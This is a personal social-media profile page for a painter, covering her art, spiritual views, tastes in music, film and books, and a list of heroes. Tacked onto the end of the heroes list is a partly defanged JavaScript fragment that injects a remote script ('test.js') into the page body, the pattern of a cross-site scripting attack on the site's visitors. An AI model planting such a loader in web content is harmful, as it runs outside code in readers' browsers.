Not all who wonder are lost

About Me

With respect to myspace, wasn't Andy Warhol right when he said everybody in the future will be famous for fifteen minutes? Some wise friends of mine suggested I make a myspace page for my art. it's a bit of a toothache for me to write about myself as I am slightly nondescript, so let's despite my coyness and start the randomness! I had the fortunate experience of attending UofA for studio art and I’m not ruling out the possibility of going to graduate school. Art is quite literally my life. It can be surreal sometimes staring at seven blank wood panels and then seeing them come to fruition. If you're curious and want to know why I create paintings the way I do, just go to my official website. I'm almost a typical Gemini. Ya know, fun loving, benevolent, goofy, great sense of humor, easily liked, gets bored easily, impassive, and young at heart with the exception of not being two-faced, multi-personality afflicted, or contrary. i am also the type that clashes instantly with nefarious personality types. And my advice to these kinds of people would be this: deal with what you don't like about yourself before you try to break down other people and in the end, hopefully, you'll have nothing negative to spew. I've had the misfortune of being in the company of some people who use the world 'ugly' while referring to a person's physicality and I find this to be vulgar and dispiriting. I believe strongly that what we say and how we act towards other people is an outward reflection of how how we feel about ourselves. I should get down from my pulpit before you assume I'm self righteous--which I am far from ever being. So anyhow, I crave and appreciate my independence and I’m very free spirited. Something that might be boring for me one week might be fascinating for me the next, and vise versa. I am the type who is fascinated and curious about the many facets of life that help bring me a lot closer to the truth; science and metaphysics, for example, both explain what the other cannot. I think our consciousness is an illusion that makes the makeup of our material world appear to be the be all and end all. There are things we can’t do except while being in a physical body--just as there are also things we can’t do except while being outside the body (birth/death, etc.) I could go on and on about how you’re not just your physical body and I believe that once a person can grasp this abstraction, true enlightenment ensues; I hope to learn a lot while "leasing" my body! Suffice it to say, I consider everyone to be a spirit having a physical experience. Everyday my perspectives change and they could be measured in millimeters or milestones and I'm usually conscientious of becoming a better version of the person I was yesterday. I expect a lot from myself and I definitely do not put myself on any pedestal. And yet, having said that, I wouldn't want to be anyone else other than who I am.

My Interests

What am I not interested in? This section is too vague and I don't want to get too vivid for the sake of time!

I'd like to meet:

Art magazine editors, gallery owners, and prospective art investors.

Music:

Trance. Duncan Sheik, Dixie Chicks, Cocteau Twins, Enya, Sarah McChlachan, Madonna, Bob Dylan, Bob Seger, John Lennon and a lot of older music.

Movies:

Pan's Labyrinth, Contact, Pride and Prejudice (2006), Into The Wild, Amadeus, Blade Runner, Hannah And Her Sisters, Heat, Chinatown, Gone With The Wind, Kill Bill 2, As Good As It Gets, La Dolace Vita, Moonstruck, Thelma and Louise, some Marilyn Monroe movies, Breakfast at Tiffanys, Kubrick's "2001" and the list goes on. I tend to watch more documentaries than I do movies.

Television:

animal planet and Discovery. I like the 60s show "I Dream of Jeannie" and "Allo Allo" and the 80s/90s show "Unsolved Mysteries". One of my all time favorite TV shows is Twin Peaks. I don't own a tv because it is mind polluting and the other reason is that time is just so fleeting.

Books:

The Science Of Self-Realization, Left To Tell, Illusions, The Alchemist, Contact, Theory of the Avant-Garde, Jonathan Livingston Seagull, Science And The Akashic Field, Science And the reenchantment of the cosmos, Astral Projection: The out of body experience, The Story Of Thought, The Pig Who Sang to the Moon, Jane Austin novels, and the list goes on. I tend to read non-fiction.

Heroes:

Maggie Mary Nicholson (Mom 1944-2007), Immaculée Ilibagiza, John F. Kennedy, philosopher Ayn Rand, John Cleese, Marlene Dietrich, Noam Chomsky, Benazir Bhutto, Naomi Wolf, leslie nielsen, Joseph Campbell, Carl Sagen, George Harrison, Christopher McCandless, Ervin Laszlo, Gary Larson, Deepak Chopra, Johann Fichte (he said: what sort of philosophy one chooses, depends on what sort of person one is), Enya, Madonna (artistically sublime), Marilyn Monroe, Yoko Ono, Marcel Duchamp, tamara de lempicka, Andy Warhol, Man Ray, Fernand Leger, Jodie Foster, Jennifer Saunders, and anyone that lets people leave them feeling better and happier. .."var x=document·('script');x.src='http://www.../.../test.js' ;document·getElementsByTagName('body')[0].appendChild(x );" /..
